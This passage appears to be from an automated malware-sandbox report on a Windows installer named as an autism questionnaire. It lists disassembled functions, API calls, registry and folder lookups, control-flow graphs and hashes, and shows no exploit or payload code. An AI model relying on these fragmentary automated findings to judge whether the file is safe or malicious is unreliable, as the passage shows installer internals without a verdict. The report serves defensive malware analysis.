                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileFindFirstLast
                                                                                              • String ID:
                                                                                              • API String ID: 873889042-0
                                                                                              • Opcode ID: 48cb86c36632e8c72cb41299c80d55c8f2305584a3cc239000e223bcc48676ca
                                                                                              • Instruction ID: 0e0656a6fbe86c5836fc78b0efda7e26b232c5910eabf30e6ebd6b813bae866c
                                                                                              • Opcode Fuzzy Hash: 48cb86c36632e8c72cb41299c80d55c8f2305584a3cc239000e223bcc48676ca
                                                                                              • Instruction Fuzzy Hash: 1BF0F931A84208ABCB14DFBA9C0189FF7ADEB4533075147BAF814D32D1DB744E004598
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E6A0, Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,0040E6FE,?,?), ref: 0040E6D3
                                                                                              • FindClose.KERNEL32(00000000,00000000,?,00000000,0040E6FE,?,?), ref: 0040E6E3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileFirst
                                                                                              • String ID:
                                                                                              • API String ID: 2295610775-0
                                                                                              • Opcode ID: 45566dd6d5ea1f2d432aa336e5a60c1e3a8d7bb9a7f17ca8116a3bd58dd3b41d
                                                                                              • Instruction ID: dec86fcb97929b74413189edb203bd87f329489ef31ab21fd3caa719f1a03e71
                                                                                              • Opcode Fuzzy Hash: 45566dd6d5ea1f2d432aa336e5a60c1e3a8d7bb9a7f17ca8116a3bd58dd3b41d
                                                                                              • Instruction Fuzzy Hash: 95F0B430540608AFCB10EBB6DC4295EB3ACEB4431479009B6F400F32D1EB395E10995C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E2C4, Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173registryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040E4E9,?,?), ref: 0040E2FD
                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9,?,?), ref: 0040E346
                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9,?,?), ref: 0040E368
                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040E386
                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040E3A4
                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040E3C2
                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040E3E0
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9), ref: 0040E420
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001), ref: 0040E44B
                                                                                              • RegCloseKey.ADVAPI32(?,0040E4D3,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001,Software\Embarcadero\Locales), ref: 0040E4C6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Open$QueryValue$CloseFileModuleName
                                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                                              • API String ID: 2701450724-3496071916
                                                                                              • Opcode ID: 5aa5f0f4598f069c7b6180d6d0362751deb9bd023370fd1abe4087e628624bde
                                                                                              • Instruction ID: 4455e1c2a3f30db0af6e145a4bce986524b579b5894be5bc8a3c80d05520e853
                                                                                              • Opcode Fuzzy Hash: 5aa5f0f4598f069c7b6180d6d0362751deb9bd023370fd1abe4087e628624bde
                                                                                              • Instruction Fuzzy Hash: 5C51F775A40608BEEB10DAA6CC42FAF77BCDB08704F5044BBBA14F61C2D6789A50DB5D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006AC23C, Relevance: 26.5, APIs: 6, Strings: 9, Instructions: 223COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 84 6ac23c-6ac23f 85 6ac244-6ac249 84->85 85->85 86 6ac24b-6ac2bc call 5c7430 call 40a5a8 call 5c745c call 40a5a8 call 5c7488 call 40a5a8 call 5c7530 call 40a5a8 call 429d18 85->86 105 6ac2da-6ac2df call 40a1c8 86->105 106 6ac2be-6ac2d8 call 5c6d5c call 40a5a8 86->106 109 6ac2e4-6ac2eb 105->109 106->109 111 6ac31f-6ac342 call 6ac0d0 call 40a5a8 109->111 112 6ac2ed-6ac30e call 5c53a0 call 40a5a8 109->112 124 6ac359-6ac37c call 6ac0d0 call 40a5a8 111->124 125 6ac344-6ac354 call 40b4c8 111->125 112->111 123 6ac310-6ac31a call 40a5a8 112->123 123->111 132 6ac37e-6ac398 call 5c4ea4 call 40b4c8 124->132 133 6ac39d-6ac3a4 124->133 125->124 132->133 135 6ac3a6-6ac3c9 call 6ac0d0 call 40a5a8 133->135 136 6ac404-6ac40b 133->136 158 6ac3cb-6ac3d0 call 60cd28 135->158 159 6ac3d5-6ac3df call 6ac0d0 135->159 138 6ac51d-6ac524 136->138 139 6ac411-6ac41e 136->139 141 6ac526-6ac545 call 5c4ea4 call 40b4c8 138->141 142 6ac547-6ac561 call 5c4ea4 call 40b4c8 138->142 139->138 144 6ac424-6ac43c SHGetKnownFolderPath 139->144 164 6ac566 call 6ac180 141->164 142->164 147 6ac43e-6ac46f call 40c8bc CoTaskMemFree 144->147 148 6ac477-6ac48f SHGetKnownFolderPath 144->148 151 6ac4ca-6ac4e2 SHGetKnownFolderPath 148->151 152 6ac491-6ac4c2 call 40c8bc CoTaskMemFree 148->152 151->138 161 6ac4e4-6ac515 call 40c8bc CoTaskMemFree 151->161 158->159 171 6ac3e4-6ac3f8 call 40a5a8 159->171 173 6ac56b-6ac585 call 40a228 164->173 171->136 178 6ac3fa-6ac3ff call 60cd28 171->178 178->136
                                                                                              APIs
                                                                                              • SHGetKnownFolderPath.SHELL32(006CD7F4,00008000,00000000,?,00000000,006AC586,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A), ref: 006AC434
                                                                                              • CoTaskMemFree.OLE32(?,006AC477,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC46A
                                                                                              • SHGetKnownFolderPath.SHELL32(006CD804,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC487
                                                                                              • CoTaskMemFree.OLE32(?,006AC4CA,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4BD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FolderFreeKnownPathTask
                                                                                              • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                              • API String ID: 969438705-544719455
                                                                                              • Opcode ID: 7984a636196e105601b5bae3f4cd8b715fa2ccf315e8b131d7c1a39997f32fcf
                                                                                              • Instruction ID: b9958020655176fa4da1f40778f72373ecd7cbade583b9d7093994fb637c8e1d
                                                                                              • Opcode Fuzzy Hash: 7984a636196e105601b5bae3f4cd8b715fa2ccf315e8b131d7c1a39997f32fcf
                                                                                              • Instruction Fuzzy Hash: A281D530E012049FDB10FFA4E852BAD7BA7EB8A714F50447AF400A7395C678AD51CF65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00410BF4, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 258COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 180 410bf4-410c8e call 4110a4 call 4110b4 call 4110c4 call 4110d4 * 3 193 410c90-410cb3 RaiseException 180->193 194 410cb8-410cc5 180->194 195 410ec8-410ece 193->195 196 410cc7 194->196 197 410cca-410cea 194->197 196->197 198 410cfd-410d05 197->198 199 410cec-410cfb call 4110e4 197->199 201 410d08-410d11 198->201 199->201 203 410d13-410d23 201->203 204 410d2a-410d2c 201->204 203->204 216 410d25 203->216 205 410d32-410d39 204->205 206 410dee-410df8 204->206 207 410d49-410d4b 205->207 208 410d3b-410d47 205->208 209 410e08-410e0a 206->209 210 410dfa-410e06 206->210 212 410d58-410d5a 207->212 213 410d4d-410d56 LoadLibraryA 207->213 208->207 214 410e57-410e59 209->214 215 410e0c-410e10 209->215 210->209 220 410da7-410db3 call 41057c 212->220 221 410d5c-410d6b GetLastError 212->221 213->212 217 410ea1-410ea4 214->217 218 410e5b-410e6a GetLastError 214->218 223 410e12-410e16 215->223 224 410e4b-410e55 GetProcAddress 215->224 225 410ea6-410ead 216->225 217->225 226 410e7a-410e7c 218->226 227 410e6c-410e78 218->227 241 410db5-410db9 220->241 242 410de8-410de9 FreeLibrary 220->242 228 410d7b-410d7d 221->228 229 410d6d-410d79 221->229 223->224 232 410e18-410e23 223->232 224->214 230 410ec6 225->230 231 410eaf-410ebe 225->231 226->217 234 410e7e-410e9e RaiseException 226->234 227->226 228->220 235 410d7f-410da2 RaiseException 228->235 229->228 230->195 231->230 232->224 236 410e25-410e2b 232->236 234->217 235->195 236->224 240 410e2d-410e3a 236->240 240->224 244 410e3c-410e47 240->244 241->206 243 410dbb-410dc9 LocalAlloc 241->243 242->206 243->206 245 410dcb-410de6 243->245 244->224 246 410e49 244->246 245->206 246->217
                                                                                              APIs
                                                                                              • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00410CAC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionRaise
                                                                                              • String ID: P\l$p\l
                                                                                              • API String ID: 3997070919-2963016475
                                                                                              • Opcode ID: aa0e87082271f6f024034dc3e0c9ed7691aad24ca827c03d937f00bb865530d3
                                                                                              • Instruction ID: dea4787ea8a346106a271a8220094215500c3d30852de538169348a6bce77c0f
                                                                                              • Opcode Fuzzy Hash: aa0e87082271f6f024034dc3e0c9ed7691aad24ca827c03d937f00bb865530d3
                                                                                              • Instruction Fuzzy Hash: EDA18D75A003099FDB24CFA9D881BEEBBB6EB58310F14452AE505A7390DBB4E9C1CF54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405D88, Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 247 405d88-405d97 248 405e80-405e83 247->248 249 405d9d-405da1 247->249 252 405f70-405f74 248->252 253 405e89-405e93 248->253 250 405da3-405daa 249->250 251 405e04-405e0d 249->251 259 405dd8-405dda 250->259 260 405dac-405db7 250->260 251->250 258 405e0f-405e18 251->258 256 405814-405839 call 405764 252->256 257 405f7a-405f7f 252->257 254 405e44-405e51 253->254 255 405e95-405ea1 253->255 254->255 268 405e53-405e5c 254->268 263 405ea3-405ea6 255->263 264 405ed8-405ee6 255->264 280 405855-40585c 256->280 281 40583b-40584a VirtualFree 256->281 258->251 267 405e1a-405e2e Sleep 258->267 265 405ddc-405ded 259->265 266 405def 259->266 261 405dc0-405dd5 260->261 262 405db9-405dbe 260->262 270 405eaa-405eae 263->270 264->270 272 405ee8-405eed call 4055dc 264->272 265->266 271 405df2-405dff 265->271 266->271 267->250 273 405e34-405e3f Sleep 267->273 268->254 274 405e5e-405e72 Sleep 268->274 276 405ef0-405efd 270->276 277 405eb0-405eb6 270->277 271->253 272->270 273->251 274->255 279 405e74-405e7b Sleep 274->279 276->277 286 405eff-405f06 call 4055dc 276->286 282 405f08-405f12 277->282 283 405eb8-405ed6 call 40561c 277->283 279->254 284 40585e-40587a VirtualQuery VirtualFree 280->284 287 405850-405853 281->287 288 40584c-40584e 281->288 289 405f40-405f6d call 40567c 282->289 290 405f14-405f3c VirtualFree 282->290 293 405881-405887 284->293 294 40587c-40587f 284->294 286->277 291 40588f-405891 287->291 288->291 296 405893-4058a3 291->296 297 4058a6-4058b6 291->297 293->291 300 405889-40588d 293->300 294->291 296->297 300->284 300->291
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000,?,?,00000000,0040F300,0040F366,?,00000000,?,?,0040F689,00000000,?,00000000,0040FB8A,00000000), ref: 00405E1E
                                                                                              • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040F300,0040F366,?,00000000,?,?,0040F689,00000000,?,00000000,0040FB8A), ref: 00405E38
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: d1f42db9d12138cdecdca87d68e48a81541cc59cd0f269c0ee0c41ffaf02f020
                                                                                              • Instruction ID: 71ad01a6e0dc675f4130d8d0918bf11407b14d9ec69c5e02b41b8aae26145368
                                                                                              • Opcode Fuzzy Hash: d1f42db9d12138cdecdca87d68e48a81541cc59cd0f269c0ee0c41ffaf02f020
                                                                                              • Instruction Fuzzy Hash: 2871C031604A008FD715DB69C989B27BBD5EF85314F18C17FE888AB3D2D6B88941CF99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006AC8CC, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 102COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,006ACA22,?,?,00000005,00000000,00000000,?,006B92B5,00000000,006B946A,?,00000000,006B94CE), ref: 006AC957
                                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,006ACA22,?,?,00000005,00000000,00000000,?,006B92B5,00000000,006B946A,?,00000000,006B94CE), ref: 006AC960
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                              • String ID: Created temporary directory: $\_setup64.tmp$_isetup$bm
                                                                                              • API String ID: 1375471231-4222912607
                                                                                              • Opcode ID: f7a217e2c30815a74382ced212125fa0efd95f934c7959fdcee1df4dfdec5075
                                                                                              • Instruction ID: fab29f73b12df9647497e51388a78cad5e0a4b86d3a417c00642db4583a337af
                                                                                              • Opcode Fuzzy Hash: f7a217e2c30815a74382ced212125fa0efd95f934c7959fdcee1df4dfdec5075
                                                                                              • Instruction Fuzzy Hash: 00412E34A102099BDB01FBA4D891AEEB7B6FF89704F50417AF501B7391DA34AE458B64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 005C92C8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91windowregistryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetActiveWindow.USER32 ref: 005C92F7
                                                                                              • GetFocus.USER32 ref: 005C92FF
                                                                                              • RegisterClassW.USER32 ref: 005C9320
                                                                                              • ShowWindow.USER32(00000000,00000008,00000000,?,00000000,4134A000,00000000,00000000,00000000,00000000,80000000,00000000,?,00000000,00000000,00000000), ref: 005C93B8
                                                                                              • SetFocus.USER32(00000000,00000000,005C93DA,?,?,00000000,00000001,00000000,?,00624EAB,006D579C,?,00000000,006B9450,?,00000001), ref: 005C93BF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FocusWindow$ActiveClassRegisterShow
                                                                                              • String ID: TWindowDisabler-Window
                                                                                              • API String ID: 495420250-1824977358
                                                                                              • Opcode ID: 6784ae0ba7057f0a8a26c4c85bfb57be43722a071822028f1ce80f015718ad1f
                                                                                              • Instruction ID: 15dfa4f4c92537cee7ed1e4bf608ea9bac44f034fc845b592ccaf34af6f1c1de
                                                                                              • Opcode Fuzzy Hash: 6784ae0ba7057f0a8a26c4c85bfb57be43722a071822028f1ce80f015718ad1f
                                                                                              • Instruction Fuzzy Hash: 1321E570A41700AFD710EBA59C56F5ABBA5FB85B00F51452DF900EB6D1EB78AC40C7D8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006C4660, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00410BA8: GetModuleHandleW.KERNEL32(00000000,?,006C4673), ref: 00410BB4
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 006C4683
                                                                                              • SetWindowLongW.USER32 ref: 006C469F
                                                                                              • SetErrorMode.KERNEL32(00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006C46B4
                                                                                                • Part of subcall function 006B9800: GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,006C46BE,00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006B980A
